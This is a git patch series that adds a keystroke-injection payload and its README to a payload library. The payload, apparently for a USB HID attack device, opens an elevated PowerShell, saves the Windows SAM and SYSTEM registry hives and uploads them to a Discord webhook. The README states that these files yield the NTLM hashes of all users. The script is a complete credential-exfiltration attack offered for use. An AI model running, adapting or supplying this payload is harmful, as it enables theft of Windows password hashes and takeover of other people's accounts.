From 15f8f25701bacc1816c1f942268517cf2d14f22b Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Wed, 25 Sep 2024 00:18:39 +0200
Subject: [PATCH 1/4] Create payload.txt

---
 .../ntlm_exfiltration/payload.txt             | 34 +++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 payloads/library/exfiltration/ntlm_exfiltration/payload.txt

diff --git a/payloads/library/exfiltration/ntlm_exfiltration/payload.txt b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt
new file mode 100644
index 0000000..ee2b9d6
--- /dev/null
+++ b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt
@@ -0,0 +1,34 @@
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: luu176
+
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+END_EXTENSION
+
+DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
+GUI d
+DELAY 1000
+GUI r
+DELAY 1000
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 3000
+LEFTARROW
+ENTER
+DELAY 3000
+STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
+DELAY 500
+GUI d

From c898ed7858a76b584333672f2873b219d9f17a56 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Wed, 25 Sep 2024 00:20:06 +0200
Subject: [PATCH 2/4] Create README.md

---
 .../exfiltration/ntlm_exfiltration/README.md  | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 payloads/library/exfiltration/ntlm_exfiltration/README.md

diff --git a/payloads/library/exfiltration/ntlm_exfiltration/README.md b/payloads/library/exfiltration/ntlm_exfiltration/README.md
new file mode 100644
index 0000000..acba0c3
--- /dev/null
+++ b/payloads/library/exfiltration/ntlm_exfiltration/README.md
@@ -0,0 +1,28 @@
+# Exfiltrate NTLM Hash - Windows ✅
+
+A script used to exfiltrate the NTLM hash on a Windows machine.
+
+## Description
+
+A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook.
+
+### Settings
+
+* Set the Discord webhook URL
+* Ensure the webhook permissions are configured
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/luu176">
+        <img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+  </tr>
+</table>
+</div>

From a81ecd3e6494b7a443e57bec4afa449bed7d8661 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Wed, 25 Sep 2024 00:21:49 +0200
Subject: [PATCH 3/4] Update payload.txt

---
 payloads/library/exfiltration/ntlm_exfiltration/payload.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/exfiltration/ntlm_exfiltration/payload.txt b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt
index ee2b9d6..7204ad5 100644
--- a/payloads/library/exfiltration/ntlm_exfiltration/payload.txt
+++ b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt
@@ -1,6 +1,6 @@
 EXTENSION PASSIVE_WINDOWS_DETECT
     REM VERSION 1.1
-    REM AUTHOR: luu176
+    REM AUTHOR: Korben
 
     DEFINE #MAX_WAIT 150
     DEFINE #CHECK_INTERVAL 20

From 0df301160179eee71ee464e53a9f31e0584952eb Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Wed, 25 Sep 2024 00:23:30 +0200
Subject: [PATCH 4/4] Update README.md

---
 payloads/library/exfiltration/ntlm_exfiltration/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/exfiltration/ntlm_exfiltration/README.md b/payloads/library/exfiltration/ntlm_exfiltration/README.md
index acba0c3..4e31910 100644
--- a/payloads/library/exfiltration/ntlm_exfiltration/README.md
+++ b/payloads/library/exfiltration/ntlm_exfiltration/README.md
@@ -4,7 +4,7 @@ A script used to exfiltrate the NTLM hash on a Windows machine.
 
 ## Description
 
-A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook.
+A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
 
 ### Settings